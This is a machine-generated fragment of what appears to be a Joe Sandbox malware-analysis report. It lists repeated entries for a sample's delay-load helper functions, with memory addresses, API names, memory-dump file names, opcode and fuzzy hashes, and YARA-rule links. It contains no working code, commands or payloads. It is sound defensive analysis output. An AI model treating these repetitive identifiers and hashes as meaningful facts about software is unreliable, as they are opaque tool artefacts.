                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: 6c7dd233f0ef18ab706ae329cc6474a9acf2915671ac240fd9e93b5bcc42e42b
                                                                                                                    • Instruction ID: c0b3793d047cbe1162a3e2fad151fa0fac38426e06eb6065285b5e181203ad34
                                                                                                                    • Opcode Fuzzy Hash: 6c7dd233f0ef18ab706ae329cc6474a9acf2915671ac240fd9e93b5bcc42e42b
                                                                                                                    • Instruction Fuzzy Hash: 45A011E22A8002BC3808E2822C83C3B028CC0C0B2033088FEF822C8080AC80A8800830
                                                                                                                    Function 00B9E3EF Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B9E3FC
                                                                                                                      • Part of subcall function 00B9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9E8D0
                                                                                                                      • Part of subcall function 00B9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: a919328e61be80fd68c071b25f11d79c29282d771e8ea33fb4b54afdba0d8adf
                                                                                                                    • Instruction ID: 0dc8612b6bf6b50bdb3ca9edf2b5088141ccc0bf8a9ab5f5cbad26f9f792c0d1
                                                                                                                    • Opcode Fuzzy Hash: a919328e61be80fd68c071b25f11d79c29282d771e8ea33fb4b54afdba0d8adf
                                                                                                                    • Instruction Fuzzy Hash: 5DA011E22A80023E3808E282AC82C3B038CC0C0B2033088FEF832AA080BC8088000832
                                                                                                                    Function 00B9E43C Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B9E3FC
                                                                                                                      • Part of subcall function 00B9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9E8D0
                                                                                                                      • Part of subcall function 00B9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: 6b1e07c7360fe2e1eb576cd8bd386476268c44d978934470fddcf2e4f298bb4c
                                                                                                                    • Instruction ID: 3c059c212e3aa3a048ffea98f87d45041ff6762fdce07517b97b77c67fe2f95b
                                                                                                                    • Opcode Fuzzy Hash: 6b1e07c7360fe2e1eb576cd8bd386476268c44d978934470fddcf2e4f298bb4c
                                                                                                                    • Instruction Fuzzy Hash: B6A011E22AC002BC3808E282AC82C3B038CC0C0B2033088FEF8228A080BC8088000832
                                                                                                                    Function 00B9E432 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B9E3FC
                                                                                                                      • Part of subcall function 00B9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9E8D0
                                                                                                                      • Part of subcall function 00B9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: 9f46c879124b480615844e868cd22513a2f3007f8d4cd9ca54bd5697609509af
                                                                                                                    • Instruction ID: 3c059c212e3aa3a048ffea98f87d45041ff6762fdce07517b97b77c67fe2f95b
                                                                                                                    • Opcode Fuzzy Hash: 9f46c879124b480615844e868cd22513a2f3007f8d4cd9ca54bd5697609509af
                                                                                                                    • Instruction Fuzzy Hash: B6A011E22AC002BC3808E282AC82C3B038CC0C0B2033088FEF8228A080BC8088000832
                                                                                                                    Function 00B9E414 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B9E3FC
                                                                                                                      • Part of subcall function 00B9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9E8D0
                                                                                                                      • Part of subcall function 00B9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: b29970a7fd764572a198b73aa6fb41c6dcf7662a94b3ca182a2f0c1e594b6222
                                                                                                                    • Instruction ID: 3c059c212e3aa3a048ffea98f87d45041ff6762fdce07517b97b77c67fe2f95b
                                                                                                                    • Opcode Fuzzy Hash: b29970a7fd764572a198b73aa6fb41c6dcf7662a94b3ca182a2f0c1e594b6222
                                                                                                                    • Instruction Fuzzy Hash: B6A011E22AC002BC3808E282AC82C3B038CC0C0B2033088FEF8228A080BC8088000832
                                                                                                                    Function 00B9E40A Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B9E3FC
                                                                                                                      • Part of subcall function 00B9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9E8D0
                                                                                                                      • Part of subcall function 00B9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: cbb7ebc414809569bcf3aab43592c78311a51eb927ec5b5d412c4341dcb17bf5
                                                                                                                    • Instruction ID: 3c059c212e3aa3a048ffea98f87d45041ff6762fdce07517b97b77c67fe2f95b
                                                                                                                    • Opcode Fuzzy Hash: cbb7ebc414809569bcf3aab43592c78311a51eb927ec5b5d412c4341dcb17bf5
                                                                                                                    • Instruction Fuzzy Hash: B6A011E22AC002BC3808E282AC82C3B038CC0C0B2033088FEF8228A080BC8088000832
                                                                                                                    Function 00B9E446 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B9E3FC
                                                                                                                      • Part of subcall function 00B9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9E8D0
                                                                                                                      • Part of subcall function 00B9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: 96f78db9f165dd51a52bcf3b379c6ab1e4e859be9899cb59aa583586cf8256c4
                                                                                                                    • Instruction ID: 3c059c212e3aa3a048ffea98f87d45041ff6762fdce07517b97b77c67fe2f95b
                                                                                                                    • Opcode Fuzzy Hash: 96f78db9f165dd51a52bcf3b379c6ab1e4e859be9899cb59aa583586cf8256c4
                                                                                                                    • Instruction Fuzzy Hash: B6A011E22AC002BC3808E282AC82C3B038CC0C0B2033088FEF8228A080BC8088000832
                                                                                                                    Function 00B9E5A2 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B9E580
                                                                                                                      • Part of subcall function 00B9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9E8D0
                                                                                                                      • Part of subcall function 00B9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: d1c77e03578586ff7b8cf8b5ca08ae37816ee8482f2071b5dbea3565f21e27c5
                                                                                                                    • Instruction ID: 5dda8a43ef451975d1f91d758db3bf14d9704fa382f48c28223759a15e685ce8
                                                                                                                    • Opcode Fuzzy Hash: d1c77e03578586ff7b8cf8b5ca08ae37816ee8482f2071b5dbea3565f21e27c5
                                                                                                                    • Instruction Fuzzy Hash: DCA011C22A8002BC3808E2A02C82C3B028CC0C0B2033288FEF822820E0BC8088000830
                                                                                                                    Function 00B9E58E Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B9E580
                                                                                                                      • Part of subcall function 00B9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9E8D0
                                                                                                                      • Part of subcall function 00B9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: fc4de28800c55bfca7311043ec43d7a1db9980786be0e40595034a46f0ac412c
                                                                                                                    • Instruction ID: 5dda8a43ef451975d1f91d758db3bf14d9704fa382f48c28223759a15e685ce8
                                                                                                                    • Opcode Fuzzy Hash: fc4de28800c55bfca7311043ec43d7a1db9980786be0e40595034a46f0ac412c
                                                                                                                    • Instruction Fuzzy Hash: DCA011C22A8002BC3808E2A02C82C3B028CC0C0B2033288FEF822820E0BC8088000830
                                                                                                                    Function 00B9E573 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B9E580
                                                                                                                      • Part of subcall function 00B9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9E8D0
                                                                                                                      • Part of subcall function 00B9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: 4b2336450ba8d354402e14d69968548551dac3f0c0013febc901f246f7fea7f2
                                                                                                                    • Instruction ID: a014c4f47a88a9054eafe820d23a8bc8a4400c7340e5c6a4b1c42f717c2ed3bd
                                                                                                                    • Opcode Fuzzy Hash: 4b2336450ba8d354402e14d69968548551dac3f0c0013febc901f246f7fea7f2
                                                                                                                    • Instruction Fuzzy Hash: 0DA011C22A80003C3808E2A02C82C3B0A8CC0E0B2233282FEF822A20E0BC8088000830
                                                                                                                    Function 00B9E569 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B9E51F
                                                                                                                      • Part of subcall function 00B9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9E8D0
                                                                                                                      • Part of subcall function 00B9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: 0bb6b50d525aaa3b2e4f3dbfa3109a9ebbd2ebf9119a0eb894410b7fc181a827
                                                                                                                    • Instruction ID: 60d54fdcedb85bdb9e71290b0cacac07cbc2a47b7a8c40a6cdeb568c3777bfb0
                                                                                                                    • Opcode Fuzzy Hash: 0bb6b50d525aaa3b2e4f3dbfa3109a9ebbd2ebf9119a0eb894410b7fc181a827
                                                                                                                    • Instruction Fuzzy Hash: 3FA011C22A8002BC3808E2802C82CBB0A8CC0C2F2033088FEF822800A0BC80CC000830
                                                                                                                    Function 00B9E55F Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B9E51F
                                                                                                                      • Part of subcall function 00B9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9E8D0
                                                                                                                      • Part of subcall function 00B9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: 94869ae745b56b0f6d9ee51ce2e61d420c892f1416818ba46b54b4474618f977
                                                                                                                    • Instruction ID: 60d54fdcedb85bdb9e71290b0cacac07cbc2a47b7a8c40a6cdeb568c3777bfb0
                                                                                                                    • Opcode Fuzzy Hash: 94869ae745b56b0f6d9ee51ce2e61d420c892f1416818ba46b54b4474618f977
                                                                                                                    • Instruction Fuzzy Hash: 3FA011C22A8002BC3808E2802C82CBB0A8CC0C2F2033088FEF822800A0BC80CC000830
                                                                                                                    Function 00B9E555 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B9E51F
                                                                                                                      • Part of subcall function 00B9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9E8D0
                                                                                                                      • Part of subcall function 00B9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: 32e1c4d1ceac50c9985475398bae8121934b548bf90820b562295bc03fe742a4
                                                                                                                    • Instruction ID: 60d54fdcedb85bdb9e71290b0cacac07cbc2a47b7a8c40a6cdeb568c3777bfb0
                                                                                                                    • Opcode Fuzzy Hash: 32e1c4d1ceac50c9985475398bae8121934b548bf90820b562295bc03fe742a4
                                                                                                                    • Instruction Fuzzy Hash: 3FA011C22A8002BC3808E2802C82CBB0A8CC0C2F2033088FEF822800A0BC80CC000830
                                                                                                                    Function 00B9E541 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B9E51F
                                                                                                                      • Part of subcall function 00B9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9E8D0
                                                                                                                      • Part of subcall function 00B9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: 77d4d4ea954233856621f6bf34f4ccd03c3ac06035b8cf7429de1f737ea27cad
                                                                                                                    • Instruction ID: 60d54fdcedb85bdb9e71290b0cacac07cbc2a47b7a8c40a6cdeb568c3777bfb0
                                                                                                                    • Opcode Fuzzy Hash: 77d4d4ea954233856621f6bf34f4ccd03c3ac06035b8cf7429de1f737ea27cad
                                                                                                                    • Instruction Fuzzy Hash: 3FA011C22A8002BC3808E2802C82CBB0A8CC0C2F2033088FEF822800A0BC80CC000830
